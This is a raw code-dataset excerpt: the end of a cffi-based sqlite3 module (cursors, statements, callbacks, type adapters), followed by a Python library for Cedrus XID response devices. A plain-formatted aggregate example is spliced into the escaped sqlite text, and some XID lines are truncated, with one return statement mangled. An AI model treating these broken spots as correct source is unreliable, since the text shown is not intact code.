params = _convert_params(context, argc, c_params)\n try:\n aggregate.step(*params)\n except Exception:\n msg = (b\"user-defined aggregate's 'step' \"\n b\"method raised error\")\n _lib.sqlite3_result_error(context, msg, len(msg))\n\n @_ffi.callback(\"void(sqlite3_context*)\")\n def final_callback(context):\n res = _lib.sqlite3_aggregate_context(context,\n _ffi.sizeof(\"size_t\"))\n aggregate_ptr = _ffi.cast(\"size_t[1]\", res)\n\n if aggregate_ptr[0]:\n aggregate = self.__aggregate_instances[aggregate_ptr[0]]\n try:\n val = aggregate.finalize()\n except Exception:\n msg = (b\"user-defined aggregate's 'finalize' \"\n b\"method raised error\")\n 
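# A usage-level sketch of the aggregate protocol that the step/final callbacks
# above implement: a class exposing step() and finalize(), registered through
# create_aggregate(). Shown with the standard-library sqlite3 module; the
# table, column and aggregate names are invented.
import math
import sqlite3

class GeoMean:
    def __init__(self):
        self.log_sum, self.n = 0.0, 0

    def step(self, value):
        self.log_sum += math.log(value)
        self.n += 1

    def finalize(self):
        return math.exp(self.log_sum / self.n) if self.n else None

con = sqlite3.connect(":memory:")
con.create_aggregate("geomean", 1, GeoMean)
con.execute("CREATE TABLE t (x REAL)")
con.executemany("INSERT INTO t VALUES (?)", [(1.0,), (4.0,), (16.0,)])
print(con.execute("SELECT geomean(x) FROM t").fetchone()[0])   # 4.0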
_lib.sqlite3_result_error(context, msg, len(msg))\n else:\n _convert_result(context, val)\n finally:\n del self.__aggregate_instances[aggregate_ptr[0]]\n\n self.__aggregates[cls] = (step_callback, final_callback)\n\n if isinstance(name, unicode):\n name = name.encode('utf-8')\n ret = _lib.sqlite3_create_function(self._db, name, num_args,\n _lib.SQLITE_UTF8, _ffi.NULL,\n _ffi.NULL,\n step_callback,\n final_callback)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n\n @_check_thread_wrap\n @_check_closed_wrap\n def create_collation(self, name, callback):\n name = name.upper()\n if not all(c in string.ascii_uppercase + string.digits + '_' for c in name):\n raise ProgrammingError(\"invalid character in collation name\")\n\n if callback is None:\n del self.__collations[name]\n collation_callback = _ffi.NULL\n else:\n if not callable(callback):\n raise TypeError(\"parameter must be callable\")\n\n @_ffi.callback(\"int(void*, int, const void*, int, const void*)\")\n def collation_callback(context, len1, str1, len2, str2):\n text1 = _ffi.buffer(str1, len1)[:]\n text2 = _ffi.buffer(str2, len2)[:]\n try:\n ret = callback(text1, text2)\n assert isinstance(ret, (int, long))\n return cmp(ret, 0)\n except Exception:\n return 0\n\n self.__collations[name] = collation_callback\n\n if isinstance(name, unicode):\n name = name.encode('utf-8')\n ret = _lib.sqlite3_create_collation(self._db, name,\n _lib.SQLITE_UTF8,\n _ffi.NULL,\n collation_callback)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n\n @_check_thread_wrap\n @_check_closed_wrap\n def set_authorizer(self, callback):\n try:\n authorizer = self.__func_cache[callback]\n except KeyError:\n @_ffi.callback(\"int(void*, int, const char*, const char*, \"\n \"const char*, const char*)\")\n def authorizer(userdata, action, arg1, arg2, dbname, source):\n try:\n ret = callback(action, arg1, arg2, dbname, source)\n assert isinstance(ret, int)\n # try to detect cases in which cffi would swallow\n # OverflowError when casting the return value\n assert int(_ffi.cast('int', ret)) == ret\n return ret\n except Exception:\n return _lib.SQLITE_DENY\n self.__func_cache[callback] = authorizer\n\n ret = _lib.sqlite3_set_authorizer(self._db, authorizer, _ffi.NULL)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n\n @_check_thread_wrap\n @_check_closed_wrap\n def set_progress_handler(self, callable, nsteps):\n if callable is None:\n progress_handler = _ffi.NULL\n else:\n try:\n progress_handler = self.__func_cache[callable]\n except KeyError:\n @_ffi.callback(\"int(void*)\")\n def progress_handler(userdata):\n try:\n return bool(callable())\n except Exception:\n # abort query if error occurred\n return 1\n self.__func_cache[callable] = progress_handler\n _lib.sqlite3_progress_handler(self._db, nsteps, progress_handler,\n _ffi.NULL)\n\n if sys.version_info[0] >= 3:\n def __get_in_transaction(self):\n return self._in_transaction\n in_transaction = property(__get_in_transaction)\n\n def __get_total_changes(self):\n self._check_closed()\n return _lib.sqlite3_total_changes(self._db)\n total_changes = property(__get_total_changes)\n\n def __get_isolation_level(self):\n return self._isolation_level\n\n def __set_isolation_level(self, val):\n if val is None:\n self.commit()\n else:\n self.__begin_statement = str(\"BEGIN \" + val).encode('utf-8')\n self._isolation_level = val\n isolation_level = property(__get_isolation_level, __set_isolation_level)\n\n if hasattr(_lib, 'sqlite3_enable_load_extension'):\n @_check_thread_wrap\n 
@_check_closed_wrap\n def enable_load_extension(self, enabled):\n rc = _lib.sqlite3_enable_load_extension(self._db, int(enabled))\n if rc != _lib.SQLITE_OK:\n raise OperationalError(\"Error enabling load extension\")\n\n\nclass Cursor(object):\n __initialized = False\n __statement = None\n\n def __init__(self, con):\n if not isinstance(con, Connection):\n raise TypeError\n self.__connection = con\n\n self.arraysize = 1\n self.row_factory = None\n self._reset = False\n self.__locked = False\n self.__closed = False\n self.__lastrowid = None\n self.__rowcount = -1\n\n con._check_thread()\n con._remember_cursor(self)\n\n self.__initialized = True\n\n def close(self):\n self.__connection._check_thread()\n self.__connection._check_closed()\n if self.__statement:\n self.__statement._reset()\n self.__statement = None\n self.__closed = True\n\n def __check_cursor(self):\n if not self.__initialized:\n raise ProgrammingError(\"Base Cursor.__init__ not called.\")\n if self.__closed:\n raise ProgrammingError(\"Cannot operate on a closed cursor.\")\n if self.__locked:\n raise ProgrammingError(\"Recursive use of cursors not allowed.\")\n self.__connection._check_thread()\n self.__connection._check_closed()\n\n def __check_cursor_wrap(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n self.__check_cursor()\n return func(self, *args, **kwargs)\n return wrapper\n\n def __check_reset(self):\n if self._reset:\n raise InterfaceError(\n \"Cursor needed to be reset because of commit/rollback \"\n \"and can no longer be fetched from.\")\n\n def __build_row_cast_map(self):\n if not self.__connection._detect_types:\n return\n self.__row_cast_map = []\n for i in xrange(_lib.sqlite3_column_count(self.__statement._statement)):\n converter = None\n\n if self.__connection._detect_types & PARSE_COLNAMES:\n colname = _lib.sqlite3_column_name(self.__statement._statement, i)\n if colname:\n colname = _ffi.string(colname).decode('utf-8')\n type_start = -1\n key = None\n for pos in range(len(colname)):\n if colname[pos] == '[':\n type_start = pos + 1\n elif colname[pos] == ']' and type_start != -1:\n key = colname[type_start:pos]\n converter = converters[key.upper()]\n\n if converter is None and self.__connection._detect_types & PARSE_DECLTYPES:\n decltype = _lib.sqlite3_column_decltype(self.__statement._statement, i)\n if decltype:\n decltype = _ffi.string(decltype).decode('utf-8')\n # if multiple words, use first, eg.\n # \"INTEGER NOT NULL\" => \"INTEGER\"\n decltype = decltype.split()[0]\n if '(' in decltype:\n decltype = decltype[:decltype.index('(')]\n converter = converters.get(decltype.upper(), None)\n\n self.__row_cast_map.append(converter)\n\n def __fetch_one_row(self):\n num_cols = _lib.sqlite3_data_count(self.__statement._statement)\n row = newlist_hint(num_cols)\n for i in xrange(num_cols):\n if self.__connection._detect_types:\n converter = self.__row_cast_map[i]\n else:\n converter = None\n\n if converter is not None:\n blob = _lib.sqlite3_column_blob(self.__statement._statement, i)\n if not blob:\n val = None\n else:\n blob_len = _lib.sqlite3_column_bytes(self.__statement._statement, i)\n val = _ffi.buffer(blob, blob_len)[:]\n val = converter(val)\n else:\n typ = _lib.sqlite3_column_type(self.__statement._statement, i)\n if typ == _lib.SQLITE_NULL:\n val = None\n elif typ == _lib.SQLITE_INTEGER:\n val = _lib.sqlite3_column_int64(self.__statement._statement, i)\n val = int(val)\n elif typ == _lib.SQLITE_FLOAT:\n val = _lib.sqlite3_column_double(self.__statement._statement, i)\n elif typ == 
_lib.SQLITE_TEXT:\n text = _lib.sqlite3_column_text(self.__statement._statement, i)\n text_len = _lib.sqlite3_column_bytes(self.__statement._statement, i)\n val = _ffi.buffer(text, text_len)[:]\n try:\n val = self.__connection.text_factory(val)\n except Exception:\n column_name = _lib.sqlite3_column_name(\n self.__statement._statement, i)\n if column_name:\n column_name = _ffi.string(column_name).decode('utf-8')\n else:\n column_name = \"\"\n val = val.decode('ascii', 'replace')\n raise OperationalError(\n \"Could not decode to UTF-8 column '%s' with text '%s'\" % (\n column_name, val))\n elif typ == _lib.SQLITE_BLOB:\n blob = _lib.sqlite3_column_blob(self.__statement._statement, i)\n blob_len = _lib.sqlite3_column_bytes(self.__statement._statement, i)\n val = _BLOB_TYPE(_ffi.buffer(blob, blob_len)[:])\n row.append(val)\n return tuple(row)\n\n def __execute(self, multiple, sql, many_params):\n self.__locked = True\n self._reset = False\n try:\n del self.__next_row\n except AttributeError:\n pass\n try:\n if not isinstance(sql, basestring):\n raise ValueError(\"operation parameter must be str or unicode\")\n try:\n del self.__description\n except AttributeError:\n pass\n self.__rowcount = -1\n self.__statement = self.__connection._statement_cache.get(sql)\n\n if self.__connection._isolation_level is not None:\n if self.__statement._type in (\n _STMT_TYPE_UPDATE,\n _STMT_TYPE_DELETE,\n _STMT_TYPE_INSERT,\n _STMT_TYPE_REPLACE\n ):\n if not self.__connection._in_transaction:\n self.__connection._begin()\n elif self.__statement._type == _STMT_TYPE_OTHER:\n if self.__connection._in_transaction:\n self.__connection.commit()\n elif self.__statement._type == _STMT_TYPE_SELECT:\n if multiple:\n raise ProgrammingError(\"You cannot execute SELECT \"\n \"statements in executemany().\")\n\n for params in many_params:\n self.__statement._set_params(params)\n\n # Actually execute the SQL statement\n ret = _lib.sqlite3_step(self.__statement._statement)\n\n if ret == _lib.SQLITE_ROW:\n if multiple:\n raise ProgrammingError(\"executemany() can only execute DML statements.\")\n self.__build_row_cast_map()\n self.__next_row = self.__fetch_one_row()\n elif ret == _lib.SQLITE_DONE:\n if not multiple:\n self.__statement._reset()\n else:\n self.__statement._reset()\n raise self.__connection._get_exception(ret)\n\n if self.__statement._type in (\n _STMT_TYPE_UPDATE,\n _STMT_TYPE_DELETE,\n _STMT_TYPE_INSERT,\n _STMT_TYPE_REPLACE\n ):\n if self.__rowcount == -1:\n self.__rowcount = 0\n self.__rowcount += _lib.sqlite3_changes(self.__connection._db)\n\n if not multiple and self.__statement._type == _STMT_TYPE_INSERT:\n self.__lastrowid = _lib.sqlite3_last_insert_rowid(self.__connection._db)\n else:\n self.__lastrowid = None\n\n if multiple:\n self.__statement._reset()\n finally:\n self.__connection._in_transaction = \\\n not _lib.sqlite3_get_autocommit(self.__connection._db)\n self.__locked = False\n return self\n\n @__check_cursor_wrap\n def execute(self, sql, params=[]):\n return self.__execute(False, sql, [params])\n\n @__check_cursor_wrap\n def executemany(self, sql, many_params):\n return self.__execute(True, sql, many_params)\n\n def executescript(self, sql):\n self.__check_cursor()\n self._reset = False\n if isinstance(sql, unicode):\n sql = sql.encode('utf-8')\n elif not isinstance(sql, str):\n raise ValueError(\"script argument must be unicode or string.\")\n statement_star = _ffi.new('sqlite3_stmt **')\n next_char = _ffi.new('char **')\n\n self.__connection.commit()\n while True:\n c_sql = 
_ffi.new(\"char[]\", sql)\n rc = _lib.sqlite3_prepare(self.__connection._db, c_sql, -1,\n statement_star, next_char)\n if rc != _lib.SQLITE_OK:\n raise self.__connection._get_exception(rc)\n\n rc = _lib.SQLITE_ROW\n while rc == _lib.SQLITE_ROW:\n if not statement_star[0]:\n rc = _lib.SQLITE_OK\n else:\n rc = _lib.sqlite3_step(statement_star[0])\n\n if rc != _lib.SQLITE_DONE:\n _lib.sqlite3_finalize(statement_star[0])\n if rc == _lib.SQLITE_OK:\n break\n else:\n raise self.__connection._get_exception(rc)\n\n rc = _lib.sqlite3_finalize(statement_star[0])\n if rc != _lib.SQLITE_OK:\n raise self.__connection._get_exception(rc)\n\n sql = _ffi.string(next_char[0])\n if not sql:\n break\n return self\n\n def __iter__(self):\n return self\n\n def __next__(self):\n self.__check_cursor()\n self.__check_reset()\n if not self.__statement:\n raise StopIteration\n\n try:\n next_row = self.__next_row\n except AttributeError:\n raise StopIteration\n del self.__next_row\n\n if self.row_factory is not None:\n next_row = self.row_factory(self, next_row)\n\n ret = _lib.sqlite3_step(self.__statement._statement)\n if ret == _lib.SQLITE_ROW:\n self.__next_row = self.__fetch_one_row()\n else:\n self.__statement._reset()\n if ret != _lib.SQLITE_DONE:\n raise self.__connection._get_exception(ret)\n return next_row\n\n if sys.version_info[0] < 3:\n next = __next__\n del __next__\n\n def fetchone(self):\n return next(self, None)\n\n def fetchmany(self, size=None):\n if size is None:\n size = self.arraysize\n lst = []\n for row in self:\n lst.append(row)\n if len(lst) == size:\n break\n return lst\n\n def fetchall(self):\n return list(self)\n\n def __get_connection(self):\n return self.__connection\n connection = property(__get_connection)\n\n def __get_rowcount(self):\n return self.__rowcount\n rowcount = property(__get_rowcount)\n\n def __get_description(self):\n try:\n return self.__description\n except AttributeError:\n if self.__statement:\n self.__description = self.__statement._get_description()\n return self.__description\n description = property(__get_description)\n\n def __get_lastrowid(self):\n return self.__lastrowid\n lastrowid = property(__get_lastrowid)\n\n def setinputsizes(self, *args):\n pass\n\n def setoutputsize(self, *args):\n pass\n\n\nclass Statement(object):\n _statement = None\n\n def __init__(self, connection, sql):\n self.__con = connection\n\n self._in_use = False\n\n if not isinstance(sql, basestring):\n raise Warning(\"SQL is of wrong type. 
Must be string or unicode.\")\n if '\\0' in sql:\n raise ValueError(\"the query contains a null character\")\n\n first_word = sql.lstrip().split(\" \")[0].upper()\n if first_word == \"\":\n self._type = _STMT_TYPE_INVALID\n elif first_word == \"SELECT\":\n self._type = _STMT_TYPE_SELECT\n elif first_word == \"INSERT\":\n self._type = _STMT_TYPE_INSERT\n elif first_word == \"UPDATE\":\n self._type = _STMT_TYPE_UPDATE\n elif first_word == \"DELETE\":\n self._type = _STMT_TYPE_DELETE\n elif first_word == \"REPLACE\":\n self._type = _STMT_TYPE_REPLACE\n else:\n self._type = _STMT_TYPE_OTHER\n\n if isinstance(sql, unicode):\n sql = sql.encode('utf-8')\n statement_star = _ffi.new('sqlite3_stmt **')\n next_char = _ffi.new('char **')\n c_sql = _ffi.new(\"char[]\", sql)\n ret = _lib.sqlite3_prepare_v2(self.__con._db, c_sql, -1,\n statement_star, next_char)\n self._statement = statement_star[0]\n\n if ret == _lib.SQLITE_OK and not self._statement:\n # an empty statement, work around that, as it's the least trouble\n self._type = _STMT_TYPE_SELECT\n c_sql = _ffi.new(\"char[]\", b\"select 42\")\n ret = _lib.sqlite3_prepare_v2(self.__con._db, c_sql, -1,\n statement_star, next_char)\n self._statement = statement_star[0]\n\n if ret != _lib.SQLITE_OK:\n raise self.__con._get_exception(ret)\n\n self.__con._remember_statement(self)\n\n tail = _ffi.string(next_char[0]).decode('utf-8')\n if _check_remaining_sql(tail):\n raise Warning(\"You can only execute one statement at a time.\")\n\n def __del__(self):\n if self._statement:\n self.__con._finalize_raw_statement(self._statement)\n\n def _finalize(self):\n if self._statement:\n self.__con._finalize_raw_statement(self._statement)\n self._statement = None\n self._in_use = False\n\n def _reset(self):\n if self._in_use and self._statement:\n _lib.sqlite3_reset(self._statement)\n self._in_use = False\n\n if sys.version_info[0] < 3:\n def __check_decodable(self, param):\n if self.__con.text_factory in (unicode, OptimizedUnicode,\n _unicode_text_factory):\n for c in param:\n if ord(c) & 0x80 != 0:\n raise self.__con.ProgrammingError(\n \"You must not use 8-bit bytestrings unless \"\n \"you use a text_factory that can interpret \"\n \"8-bit bytestrings (like text_factory = str). 
\"\n \"It is highly recommended that you instead \"\n \"just switch your application to Unicode strings.\")\n\n def __set_param(self, idx, param):\n cvt = converters.get(type(param))\n if cvt is not None:\n param = cvt(param)\n\n try:\n param = adapt(param)\n except:\n pass # And use previous value\n\n if param is None:\n rc = _lib.sqlite3_bind_null(self._statement, idx)\n elif isinstance(param, (bool, int, long)):\n if -2147483648 <= param <= 2147483647:\n rc = _lib.sqlite3_bind_int(self._statement, idx, param)\n else:\n rc = _lib.sqlite3_bind_int64(self._statement, idx, param)\n elif isinstance(param, float):\n rc = _lib.sqlite3_bind_double(self._statement, idx, param)\n elif isinstance(param, unicode):\n param = param.encode(\"utf-8\")\n rc = _lib.sqlite3_bind_text(self._statement, idx, param,\n len(param), _SQLITE_TRANSIENT)\n elif isinstance(param, str):\n self.__check_decodable(param)\n rc = _lib.sqlite3_bind_text(self._statement, idx, param,\n len(param), _SQLITE_TRANSIENT)\n elif isinstance(param, (buffer, bytes)):\n param = bytes(param)\n rc = _lib.sqlite3_bind_blob(self._statement, idx, param,\n len(param), _SQLITE_TRANSIENT)\n else:\n rc = -1\n return rc\n\n def _set_params(self, params):\n self._in_use = True\n\n num_params_needed = _lib.sqlite3_bind_parameter_count(self._statement)\n if isinstance(params, (tuple, list)) or \\\n not isinstance(params, dict) and \\\n hasattr(params, '__getitem__'):\n try:\n num_params = len(params)\n except TypeError:\n num_params = -1\n if num_params != num_params_needed:\n raise ProgrammingError(\"Incorrect number of bindings supplied. \"\n \"The current statement uses %d, and \"\n \"there are %d supplied.\" %\n (num_params_needed, num_params))\n for i in range(num_params):\n rc = self.__set_param(i + 1, params[i])\n if rc != _lib.SQLITE_OK:\n raise InterfaceError(\"Error binding parameter %d - \"\n \"probably unsupported type.\" % i)\n elif isinstance(params, dict):\n for i in range(1, num_params_needed + 1):\n param_name = _lib.sqlite3_bind_parameter_name(self._statement, i)\n if not param_name:\n raise ProgrammingError(\"Binding %d has no name, but you \"\n \"supplied a dictionary (which has \"\n \"only names).\" % i)\n param_name = _ffi.string(param_name).decode('utf-8')[1:]\n try:\n param = params[param_name]\n except KeyError:\n raise ProgrammingError(\"You did not supply a value for \"\n \"binding %d.\" % i)\n rc = self.__set_param(i, param)\n if rc != _lib.SQLITE_OK:\n raise InterfaceError(\"Error binding parameter :%s - \"\n \"probably unsupported type.\" %\n param_name)\n else:\n raise ValueError(\"parameters are of unsupported type\")\n\n def _get_description(self):\n if self._type in (\n _STMT_TYPE_INSERT,\n _STMT_TYPE_UPDATE,\n _STMT_TYPE_DELETE,\n _STMT_TYPE_REPLACE\n ):\n return None\n desc = []\n for i in xrange(_lib.sqlite3_column_count(self._statement)):\n name = _lib.sqlite3_column_name(self._statement, i)\n if name:\n name = _ffi.string(name).decode('utf-8').split(\"[\")[0].strip()\n desc.append((name, None, None, None, None, None, None))\n return desc\n\n\nclass Row(object):\n def __init__(self, cursor, values):\n self.description = cursor.description\n self.values = values\n\n def __len__(self):\n return len(self.values)\n\n def __getitem__(self, item):\n if isinstance(item, (int, long)):\n return self.values[item]\n else:\n item = item.lower()\n for idx, desc in enumerate(self.description):\n if desc[0].lower() == item:\n return self.values[idx]\n raise IndexError(\"No item with that key\")\n\n def keys(self):\n return 
[desc[0] for desc in self.description]\n\n def __eq__(self, other):\n if not isinstance(other, Row):\n return NotImplemented\n if self.description != other.description:\n return False\n if self.values != other.values:\n return False\n return True\n\n def __ne__(self, other):\n return not self == other\n\n def __hash__(self):\n return hash(tuple(self.description)) ^ hash(tuple(self.values))\n\n\ndef _check_remaining_sql(s):\n state = \"NORMAL\"\n for char in s:\n if char == chr(0):\n return 0\n elif char == '-':\n if state == \"NORMAL\":\n state = \"LINECOMMENT_1\"\n elif state == \"LINECOMMENT_1\":\n state = \"IN_LINECOMMENT\"\n elif char in (' ', '\\t'):\n pass\n elif char == '\\n':\n if state == \"IN_LINECOMMENT\":\n state = \"NORMAL\"\n elif char == '/':\n if state == \"NORMAL\":\n state = \"COMMENTSTART_1\"\n elif state == \"COMMENTEND_1\":\n state = \"NORMAL\"\n elif state == \"COMMENTSTART_1\":\n return 1\n elif char == '*':\n if state == \"NORMAL\":\n return 1\n elif state == \"LINECOMMENT_1\":\n return 1\n elif state == \"COMMENTSTART_1\":\n state = \"IN_COMMENT\"\n elif state == \"IN_COMMENT\":\n state = \"COMMENTEND_1\"\n else:\n if state == \"COMMENTEND_1\":\n state = \"IN_COMMENT\"\n elif state == \"IN_LINECOMMENT\":\n pass\n elif state == \"IN_COMMENT\":\n pass\n else:\n return 1\n return 0\n\n\ndef _convert_params(con, nargs, params):\n _params = []\n for i in range(nargs):\n typ = _lib.sqlite3_value_type(params[i])\n if typ == _lib.SQLITE_NULL:\n val = None\n elif typ == _lib.SQLITE_INTEGER:\n val = _lib.sqlite3_value_int64(params[i])\n val = int(val)\n elif typ == _lib.SQLITE_FLOAT:\n val = _lib.sqlite3_value_double(params[i])\n elif typ == _lib.SQLITE_TEXT:\n val = _lib.sqlite3_value_text(params[i])\n val = _ffi.string(val).decode('utf-8')\n elif typ == _lib.SQLITE_BLOB:\n blob = _lib.sqlite3_value_blob(params[i])\n blob_len = _lib.sqlite3_value_bytes(params[i])\n val = _BLOB_TYPE(_ffi.buffer(blob, blob_len)[:])\n else:\n raise NotImplementedError\n _params.append(val)\n return _params\n\n\ndef _convert_result(con, val):\n if val is None:\n _lib.sqlite3_result_null(con)\n elif isinstance(val, (bool, int, long)):\n _lib.sqlite3_result_int64(con, int(val))\n elif isinstance(val, float):\n _lib.sqlite3_result_double(con, val)\n elif isinstance(val, unicode):\n val = val.encode('utf-8')\n _lib.sqlite3_result_text(con, val, len(val), _SQLITE_TRANSIENT)\n elif isinstance(val, str):\n _lib.sqlite3_result_text(con, val, len(val), _SQLITE_TRANSIENT)\n elif isinstance(val, (buffer, bytes)):\n _lib.sqlite3_result_blob(con, bytes(val), len(val), _SQLITE_TRANSIENT)\n else:\n raise NotImplementedError\n\n\ndef _function_callback(real_cb, context, nargs, c_params):\n params = _convert_params(context, nargs, c_params)\n try:\n val = real_cb(*params)\n except Exception:\n msg = b\"user-defined function raised exception\"\n _lib.sqlite3_result_error(context, msg, len(msg))\n else:\n _convert_result(context, val)\n\nconverters = {}\nadapters = {}\n\n\nclass PrepareProtocol(object):\n pass\n\n\ndef register_adapter(typ, callable):\n adapters[typ, PrepareProtocol] = callable\n\n\ndef register_converter(name, callable):\n converters[name.upper()] = callable\n\n\ndef register_adapters_and_converters():\n def adapt_date(val):\n return val.isoformat()\n\n def adapt_datetime(val):\n return val.isoformat(\" \")\n\n def convert_date(val):\n return datetime.date(*map(int, val.split(\"-\")))\n\n def convert_timestamp(val):\n datepart, timepart = val.split(\" \")\n year, month, day = map(int, 
datepart.split(\"-\"))\n timepart_full = timepart.split(\".\")\n hours, minutes, seconds = map(int, timepart_full[0].split(\":\"))\n if len(timepart_full) == 2:\n microseconds = int(timepart_full[1])\n else:\n microseconds = 0\n return datetime.datetime(year, month, day, hours, minutes, seconds,\n microseconds)\n\n register_adapter(datetime.date, adapt_date)\n register_adapter(datetime.datetime, adapt_datetime)\n register_converter(\"date\", convert_date)\n register_converter(\"timestamp\", convert_timestamp)\n\n\ndef adapt(val, proto=PrepareProtocol):\n # look for an adapter in the registry\n adapter = adapters.get((type(val), proto), None)\n if adapter is not None:\n return adapter(val)\n\n # try to have the protocol adapt this object\n if hasattr(proto, '__adapt__'):\n try:\n adapted = proto.__adapt__(val)\n except TypeError:\n pass\n else:\n if adapted is not None:\n return adapted\n\n # and finally try to have the object adapt itself\n if hasattr(val, '__conform__'):\n try:\n adapted = val.__conform__(proto)\n except TypeError:\n pass\n else:\n if adapted is not None:\n return adapted\n\n return val\n\nregister_adapters_and_converters()\n"} {"ext": "py", "sha": "1a3089150d570566c808011e5a62c579a5185fc9", "content": "# -*- coding: utf-8 -*-\nfrom serial.serialutil import SerialException\nfrom struct import unpack\n\nfrom .serial_wrapper import SerialPort\nfrom .constants import NO_KEY_DETECTED\nfrom .internal import XidConnection\nfrom .keymaps import (rb_530_keymap, rb_730_keymap, rb_830_keymap,\n rb_834_keymap, lumina_keymap)\n\n\nclass XidScanner(object):\n \"\"\"\n Scan the computer for connected XID devices\n \"\"\"\n def __init__(self):\n self.__com_ports = SerialPort.available_ports()\n self.__xid_cons = []\n self.detect_xid_devices()\n\n def detect_xid_devices(self):\n \"\"\"\n For all of the com ports connected to the computer, send an\n XID command '_c1'. If the device response with '_xid', it is\n an xid device.\n \"\"\"\n self.__xid_cons = []\n\n for c in self.__com_ports:\n device_found = False\n for b in [115200, 19200, 9600, 57600, 38400]:\n con = XidConnection(c, b)\n\n try:\n con.open()\n except SerialException:\n continue\n\n con.flush_input()\n con.flush_output()\n returnval = con.send_xid_command(\"_c1\", 5).decode('ASCII')\n\n if returnval.startswith('_xid'):\n device_found = True\n self.__xid_cons.append(con)\n\n if(returnval != '_xid0'):\n # set the device into XID mode\n con.send_xid_command('c10')\n con.flush_input()\n con.flush_output()\n\n # be sure to reset the timer to avoid the 4.66 hours\n # problem. 
(refer to XidConnection.xid_input_found to\n # read about the 4.66 hours)\n con.send_xid_command('e1')\n con.send_xid_command('e5')\n\n con.close()\n if device_found:\n break\n\n def device_at_index(self, index):\n \"\"\"\n Returns the device at the specified index\n \"\"\"\n if index >= len(self.__xid_cons):\n raise ValueError(\"Invalid device index\")\n\n return self.__xid_cons[index]\n\n def device_count(self):\n \"\"\"\n Number of XID devices connected to the computer\n \"\"\"\n return len(self.__xid_cons)\n\n\nclass BaseDevice(object):\n def __init__(self, connection, name=\"Unknown XID Device\"):\n self.con = connection\n self.device_name = name\n\n def reset_rt_timer(self):\n \"\"\"\n Resets the Reaction Time timer.\n \"\"\"\n self.con.send_xid_command(\"e5\")\n\n def reset_base_timer(self):\n \"\"\"\n Resets the base timer\n \"\"\"\n self.con.send_xid_command(\"e1\")\n\n def query_base_timer(self):\n \"\"\"\n gets the value from the device's base timer\n \"\"\"\n (_, _, time) = unpack('' % self.device_name\n\n\nclass StimTracker(BaseDevice):\n \"\"\"\n Class that encapsulates the StimTracker device.\n\n The pulse duration defaults to 100ms. To change this, call\n StimTracker.set_pulse_duration(duration_in_miliseconds)\n \"\"\"\n _lines = {1: 1,\n 2: 2,\n 3: 4,\n 4: 8,\n 5: 16,\n 6: 32,\n 7: 64,\n 8: 128}\n\n def __init__(self, connection, name=\"StimTracker\"):\n BaseDevice.__init__(self, connection, name)\n self.con.set_using_stim_tracker(True)\n self.con.send_xid_command('a10')\n self.con.clear_digital_output_lines(0xff)\n self.set_pulse_duration(100)\n\n def set_pulse_duration(self, duration):\n \"\"\"\n Sets the pulse duration for events in miliseconds when activate_line\n is called\n \"\"\"\n if duration > 4294967295:\n raise ValueError('Duration is too long. Please choose a value '\n 'less than 4294967296.')\n\n big_endian = hex(duration)[2:]\n if len(big_endian) % 2 != 0:\n big_endian = '0'+big_endian\n\n little_endian = []\n\n for i in range(0, len(big_endian), 2):\n little_endian.insert(0, big_endian[i:i+2])\n\n for i in range(0, 4-len(little_endian)):\n little_endian.append('00')\n\n command = 'mp'\n for i in little_endian:\n command += chr(int(i, 16))\n\n self.con.send_xid_command(command, 0)\n\n def activate_line(self, lines=None, bitmask=None,\n leave_remaining_lines=False):\n \"\"\"\n Triggers an output line on StimTracker.\n\n There are 8 output lines on StimTracker that can be raised in any\n combination. To raise lines 1 and 7, for example, you pass in\n the list: activate_line(lines=[1, 7]).\n\n To raise a single line, pass in just an integer, or a list with a\n single element to the lines keyword argument:\n\n activate_line(lines=3)\n\n or\n\n activate_line(lines=[3])\n\n The `lines` argument must either be an Integer, list of Integers, or\n None.\n\n If you'd rather specify a bitmask for setting the lines, you can use\n the bitmask keyword argument. Bitmask must be a Integer value between\n 0 and 255 where 0 specifies no lines, and 255 is all lines. For a\n mapping between lines and their bit values, see the `_lines` class\n variable.\n\n To use this, call the function as so to activate lines 1 and 6:\n\n activate_line(bitmask=33)\n\n leave_remaining_lines tells the function to only operate on the lines\n specified. 
For example, if lines 1 and 8 are active, and you make\n the following function call:\n\n activate_line(lines=4, leave_remaining_lines=True)\n\n This will result in lines 1, 4 and 8 being active.\n\n If you call activate_line(lines=4) with leave_remaining_lines=False\n (the default), if lines 1 and 8 were previously active, only line 4\n will be active after the call.\n \"\"\"\n if lines is None and bitmask is None:\n raise ValueError('Must set one of lines or bitmask')\n if lines is not None and bitmask is not None:\n raise ValueError('Can only set one of lines or bitmask')\n\n if bitmask is not None:\n if bitmask not in range(0, 256):\n raise ValueError('bitmask must be an integer between '\n '0 and 255')\n\n if lines is not None:\n if not isinstance(lines, list):\n lines = [lines]\n\n bitmask = 0\n for l in lines:\n if l < 1 or l > 8:\n raise ValueError('Line numbers must be between 1 and 8 '\n '(inclusive)')\n bitmask |= self._lines[l]\n\n self.con.set_digital_output_lines(bitmask, leave_remaining_lines)\n\n def clear_line(self, lines=None, bitmask=None,\n leave_remaining_lines=False):\n \"\"\"\n The inverse of activate_line. If a line is active, it deactivates it.\n\n This has the same parameters as activate_line()\n \"\"\"\n if lines is None and bitmask is None:\n raise ValueError('Must set one of lines or bitmask')\n if lines is not None and bitmask is not None:\n raise ValueError('Can only set one of lines or bitmask')\n\n if bitmask is not None:\n if bitmask not in range(0, 256):\n raise ValueError('bitmask must be an integer between '\n '0 and 255')\n\n if lines is not None:\n if not isinstance(lines, list):\n lines = [lines]\n\n bitmask = 0\n for l in lines:\n if l < 1 or l > 8:\n raise ValueError('Line numbers must be between 1 and 8 '\n '(inclusive)')\n bitmask |= self._lines[l]\n\n self.con.clear_digital_output_lines(bitmask, leave_remaining_lines)\n\n def __str__(self):\n return '' % self.device_name\n\n def __repr__(self):\n return self.__str__()\n\n\nclass XidError(Exception):\n pass\n\n\nclass XidDevice(object):\n \"\"\"\n Class for interfacing with a Cedrus XID device.\n\n At the beginning of an experiment, the developer should call:\n\n XidDevice.reset_base_timer()\n\n Whenever a stimulus is presented, the developer should call:\n\n XidDevice.reset_rt_timer()\n\n Developers Note: Currently there is a known issue of clock drift\n in the XID devices. 
